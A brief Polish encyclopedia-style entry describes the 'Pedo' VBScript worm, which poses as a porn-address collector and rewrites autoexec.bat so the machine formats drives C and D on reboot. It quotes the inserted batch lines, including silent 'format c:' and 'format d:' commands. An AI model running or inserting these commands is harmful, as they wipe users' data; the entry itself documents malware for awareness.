Robak internetowy – Pedo

Pedo to robak internetowy napisany w języku Visual Basic Script, udającym skrypt zbierający adresy stron o treści pornograficznej. W rzeczywistości jego działanie polega na formatowaniu dysków twardych.

Po uruchomieniu przez użytkownika pliku robaka zmienia on zawartość pliku autoexec.bat, dodając do niego następujące polecenia:

Echo off
cls
Echo VBS/W98.pedo1.HDFK.V2
Echo.
Echo {{{ The only Warning from {{{ ^_int21h_^ }}} Never touch Kid’s }}}
Echo.
ctty nul
format c: /autotest /q /u
format d: /autotest /q /u

Po wprowadzeniu powyższych zmian robak restartuje komputer, który podczas następnego uruchamiania systemu formatuje dyski C i D. Operacja ta powoduje zniszczenie danych znajdujące się na wspomnianych dyskach.